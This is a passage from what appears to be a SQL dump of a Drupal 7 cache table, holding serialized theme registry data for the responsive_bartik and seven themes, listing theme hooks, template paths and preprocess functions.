path\";s:25:\"sites/all/modules/adsense\";s:8:\"function\";s:16:\"theme_adsense_ad\";}s:19:\"adsense_placeholder\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:5:\"width\";i:0;s:6:\"height\";i:0;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:25:\"sites/all/modules/adsense\";s:8:\"function\";s:25:\"theme_adsense_placeholder\";}s:5:\"block\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:19:\"modules/block/block\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";i:4;s:34:\"responsive_bartik_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";a:8:{s:8:\"template\";s:38:\"modules/block/block-admin-display-form\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:44:\"template_preprocess_block_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:22:\"block__adsense_managed\";a:6:{s:8:\"template\";s:22:\"block--adsense_managed\";s:4:\"path\";s:33:\"sites/all/modules/adsense/managed\";s:14:\"render element\";s:8:\"elements\";s:9:\"base hook\";s:5:\"block\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:33:\"sites/all/modules/adsense/managed\";}}',0,1444940208,1),('theme_registry:runtime:responsive_bartik','a:157:{s:9:\"menu_tree\";a:5:{s:8:\"function\";s:27:\"responsive_bartik_menu_tree\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:4:\"tree\";s:20:\"preprocess functions\";a:1:{i:0;s:29:\"template_preprocess_menu_tree\";}}s:30:\"field__taxonomy_term_reference\";a:5:{s:8:\"function\";s:48:\"responsive_bartik_field__taxonomy_term_reference\";s:14:\"render element\";s:7:\"element\";s:9:\"base hook\";s:5:\"field\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";}s:4:\"page\";a:7:{s:8:\"template\";s:4:\"page\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";i:3;s:30:\"responsive_bartik_process_page\";}}s:15:\"comment_wrapper\";a:7:{s:8:\"template\";s:15:\"comment-wrapper\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:7:\"content\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:16:\"maintenance_page\";N;s:4:\"html\";a:7:{s:8:\"template\";s:4:\"html\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";i:5;s:33:\"responsive_bartik_preprocess_html\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";i:3;s:30:\"responsive_bartik_process_html\";}}s:7:\"comment\";N;s:4:\"node\";a:7:{s:8:\"template\";s:4:\"node\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:8:\"elements\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_node\";i:2;s:21:\"contextual_preprocess\";i:3;s:19:\"rdf_preprocess_node\";i:4;s:33:\"responsive_bartik_preprocess_node\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:11:\"block__menu\";N;s:12:\"user_picture\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:8:\"template\";s:25:\"modules/user/user-picture\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_picture\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_profile\";N;s:21:\"user_profile_category\";N;s:17:\"user_profile_item\";N;s:9:\"user_list\";N;s:22:\"user_admin_permissions\";N;s:16:\"user_admin_roles\";N;s:27:\"user_permission_description\";N;s:14:\"user_signature\";N;s:26:\"update_manager_update_form\";N;s:17:\"update_last_check\";N;s:13:\"update_report\";N;s:14:\"update_version\";N;s:19:\"update_status_label\";N;s:7:\"toolbar\";a:7:{s:14:\"render element\";s:7:\"toolbar\";s:8:\"template\";s:7:\"toolbar\";s:4:\"path\";s:15:\"modules/toolbar\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:21:\"contextual_preprocess\";i:2;s:26:\"toolbar_preprocess_toolbar\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"toolbar_toggle\";a:4:{s:9:\"variables\";a:2:{s:9:\"collapsed\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:8:\"function\";s:20:\"theme_toolbar_toggle\";}s:30:\"taxonomy_overview_vocabularies\";N;s:23:\"taxonomy_overview_terms\";N;s:13:\"taxonomy_term\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:30:\"modules/taxonomy/taxonomy-term\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_taxonomy_term\";i:2;s:21:\"contextual_preprocess\";i:3;s:28:\"rdf_preprocess_taxonomy_term\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:4:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";}s:4:\"link\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";}s:5:\"links\";a:4:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";}s:5:\"image\";a:5:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_image\";s:20:\"preprocess functions\";a:1:{i:0;s:20:\"rdf_preprocess_image\";}}s:10:\"breadcrumb\";a:4:{s:9:\"variables\";a:1:{s:10:\"breadcrumb\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_breadcrumb\";}s:4:\"help\";N;s:5:\"table\";N;s:19:\"tablesort_indicator\";N;s:4:\"mark\";N;s:9:\"item_list\";a:4:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";}s:14:\"more_help_link\";N;s:9:\"feed_icon\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_feed_icon\";}s:9:\"more_link\";N;s:8:\"username\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_username\";s:20:\"preprocess functions\";a:2:{i:0;s:28:\"template_preprocess_username\";i:1;s:23:\"rdf_preprocess_username\";}s:17:\"process functions\";a:1:{i:0;s:25:\"template_process_username\";}}s:12:\"progress_bar\";N;s:11:\"indentation\";N;s:8:\"html_tag\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_html_tag\";}s:11:\"update_page\";N;s:12:\"install_page\";N;s:9:\"task_list\";N;s:17:\"authorize_message\";N;s:16:\"authorize_report\";N;s:5:\"pager\";a:4:{s:9:\"variables\";a:4:{s:4:\"tags\";a:0:{}s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}s:8:\"quantity\";i:9;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_pager\";}s:11:\"pager_first\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_pager_first\";}s:14:\"pager_previous\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_pager_previous\";}s:10:\"pager_next\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_next\";}s:10:\"pager_last\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_last\";}s:10:\"pager_link\";N;s:9:\"menu_link\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_menu_link\";}s:15:\"menu_local_task\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_menu_local_task\";}s:17:\"menu_local_action\";N;s:16:\"menu_local_tasks\";a:4:{s:9:\"variables\";a:2:{s:7:\"primary\";a:0:{}s:9:\"secondary\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_menu_local_tasks\";}s:6:\"select\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_select\";}s:8:\"fieldset\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_fieldset\";}s:5:\"radio\";N;s:6:\"radios\";N;s:4:\"date\";N;s:15:\"exposed_filters\";N;s:8:\"checkbox\";N;s:10:\"checkboxes\";N;s:6:\"button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_button\";}s:12:\"image_button\";N;s:6:\"hidden\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_hidden\";}s:9:\"textfield\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_textfield\";}s:4:\"form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_form\";}s:8:\"textarea\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_textarea\";}s:8:\"password\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_password\";}s:4:\"file\";N;s:11:\"tableselect\";N;s:12:\"form_element\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_form_element\";}s:20:\"form_required_marker\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_form_required_marker\";}s:18:\"form_element_label\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_form_element_label\";}s:13:\"vertical_tabs\";N;s:9:\"container\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_container\";}s:18:\"system_themes_page\";N;s:20:\"system_settings_form\";N;s:12:\"confirm_form\";N;s:23:\"system_modules_fieldset\";N;s:27:\"system_modules_incompatible\";N;s:24:\"system_modules_uninstall\";N;s:13:\"status_report\";N;s:10:\"admin_page\";N;s:11:\"admin_block\";N;s:19:\"admin_block_content\";N;s:18:\"system_admin_index\";N;s:17:\"system_powered_by\";N;s:19:\"system_compact_link\";N;s:25:\"system_date_time_settings\";N;s:22:\"shortcut_set_customize\";N;s:17:\"search_block_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:8:\"template\";s:32:\"modules/search/search-block-form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_search_block_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"search_result\";N;s:14:\"search_results\";N;s:29:\"rdf_template_variable_wrapper\";a:4:{s:9:\"variables\";a:4:{s:7:\"content\";N;s:10:\"attributes\";a:0:{}s:7:\"context\";a:0:{}s:6:\"inline\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:35:\"theme_rdf_template_variable_wrapper\";}s:12:\"rdf_metadata\";a:4:{s:9:\"variables\";a:1:{s:8:\"metadata\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:18:\"theme_rdf_metadata\";}s:7:\"overlay\";N;s:23:\"overlay_disable_message\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:8:\"function\";s:29:\"theme_overlay_disable_message\";}s:12:\"options_none\";N;s:17:\"node_search_admin\";N;s:13:\"node_add_list\";N;s:12:\"node_preview\";N;s:19:\"node_admin_overview\";N;s:17:\"node_recent_block\";N;s:19:\"node_recent_content\";N;s:18:\"menu_overview_form\";N;s:19:\"menu_admin_overview\";N;s:11:\"image_style\";N;s:16:\"image_style_list\";N;s:19:\"image_style_effects\";N;s:19:\"image_style_preview\";N;s:12:\"image_anchor\";N;s:20:\"image_resize_summary\";N;s:19:\"image_scale_summary\";N;s:18:\"image_crop_summary\";N;s:20:\"image_rotate_summary\";N;s:12:\"image_widget\";N;s:15:\"image_formatter\";N;s:21:\"filter_admin_overview\";N;s:32:\"filter_admin_format_filter_order\";N;s:11:\"filter_tips\";a:6:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}}s:19:\"text_format_wrapper\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";}s:21:\"filter_tips_more_info\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_tips_more_info\";}s:17:\"filter_guidelines\";a:4:{s:9:\"variables\";a:1:{s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:23:\"theme_filter_guidelines\";}s:9:\"file_link\";N;s:9:\"file_icon\";N;s:17:\"file_managed_file\";N;s:11:\"file_widget\";N;s:20:\"file_widget_multiple\";N;s:20:\"file_formatter_table\";N;s:16:\"file_upload_help\";N;s:14:\"field_ui_table\";N;s:5:\"field\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:11:\"theme_field\";s:20:\"preprocess functions\";a:2:{i:0;s:25:\"template_preprocess_field\";i:1;s:20:\"rdf_preprocess_field\";}s:17:\"process functions\";a:1:{i:0;s:22:\"template_process_field\";}}s:25:\"field_multiple_value_form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:31:\"theme_field_multiple_value_form\";}s:13:\"dblog_message\";N;s:9:\"dashboard\";N;s:15:\"dashboard_admin\";N;s:16:\"dashboard_region\";N;s:25:\"dashboard_disabled_blocks\";N;s:24:\"dashboard_disabled_block\";N;s:28:\"dashboard_admin_display_form\";N;s:13:\"comment_block\";N;s:15:\"comment_preview\";N;s:22:\"comment_post_forbidden\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:28:\"theme_comment_post_forbidden\";}s:17:\"color_scheme_form\";N;s:10:\"adsense_ad\";N;s:19:\"adsense_placeholder\";N;s:5:\"block\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:19:\"modules/block/block\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";i:4;s:34:\"responsive_bartik_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";N;s:22:\"block__adsense_managed\";N;}',0,1444995772,1),('theme_registry:runtime:seven','a:155:{s:19:\"tablesort_indicator\";a:4:{s:8:\"function\";s:25:\"seven_tablesort_indicator\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:9:\"variables\";a:1:{s:5:\"style\";N;}}s:19:\"admin_block_content\";a:5:{s:8:\"function\";s:25:\"seven_admin_block_content\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:9:\"variables\";a:1:{s:7:\"content\";N;}}s:13:\"node_add_list\";N;s:4:\"page\";a:7:{s:8:\"template\";s:4:\"page\";s:4:\"path\";s:12:\"themes/seven\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:12:\"themes/seven\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";i:5;s:21:\"seven_preprocess_page\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";}}s:16:\"maintenance_page\";N;s:12:\"user_picture\";N;s:12:\"user_profile\";N;s:21:\"user_profile_category\";N;s:17:\"user_profile_item\";N;s:9:\"user_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"users\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:15:\"theme_user_list\";}s:22:\"user_admin_permissions\";N;s:16:\"user_admin_roles\";N;s:27:\"user_permission_description\";N;s:14:\"user_signature\";N;s:26:\"update_manager_update_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"update.manager.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:32:\"theme_update_manager_update_form\";s:8:\"includes\";a:1:{i:0;s:33:\"modules/update/update.manager.inc\";}}s:17:\"update_last_check\";a:4:{s:9:\"variables\";a:1:{s:4:\"last\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:23:\"theme_update_last_check\";}s:13:\"update_report\";N;s:14:\"update_version\";N;s:19:\"update_status_label\";N;s:7:\"toolbar\";a:7:{s:14:\"render element\";s:7:\"toolbar\";s:8:\"template\";s:7:\"toolbar\";s:4:\"path\";s:15:\"modules/toolbar\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:21:\"contextual_preprocess\";i:2;s:26:\"toolbar_preprocess_toolbar\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"toolbar_toggle\";a:4:{s:9:\"variables\";a:2:{s:9:\"collapsed\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:8:\"function\";s:20:\"theme_toolbar_toggle\";}s:30:\"taxonomy_overview_vocabularies\";N;s:23:\"taxonomy_overview_terms\";N;s:13:\"taxonomy_term\";N;s:4:\"html\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:19:\"modules/system/html\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"themes/seven\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";i:5;s:21:\"seven_preprocess_html\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:4:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";}s:4:\"link\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";}s:5:\"links\";a:4:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";}s:5:\"image\";a:5:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_image\";s:20:\"preprocess functions\";a:1:{i:0;s:20:\"rdf_preprocess_image\";}}s:10:\"breadcrumb\";a:4:{s:9:\"variables\";a:1:{s:10:\"breadcrumb\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_breadcrumb\";}s:4:\"help\";N;s:5:\"table\";a:4:{s:9:\"variables\";a:7:{s:6:\"header\";N;s:4:\"rows\";N;s:10:\"attributes\";a:0:{}s:7:\"caption\";N;s:9:\"colgroups\";a:0:{}s:6:\"sticky\";b:1;s:5:\"empty\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_table\";}s:4:\"mark\";a:4:{s:9:\"variables\";a:1:{s:4:\"type\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_mark\";}s:9:\"item_list\";a:4:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";}s:14:\"more_help_link\";N;s:9:\"feed_icon\";N;s:9:\"more_link\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_more_link\";}s:8:\"username\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_username\";s:20:\"preprocess functions\";a:2:{i:0;s:28:\"template_preprocess_username\";i:1;s:23:\"rdf_preprocess_username\";}s:17:\"process functions\";a:1:{i:0;s:25:\"template_process_username\";}}s:12:\"progress_bar\";N;s:11:\"indentation\";N;s:8:\"html_tag\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme 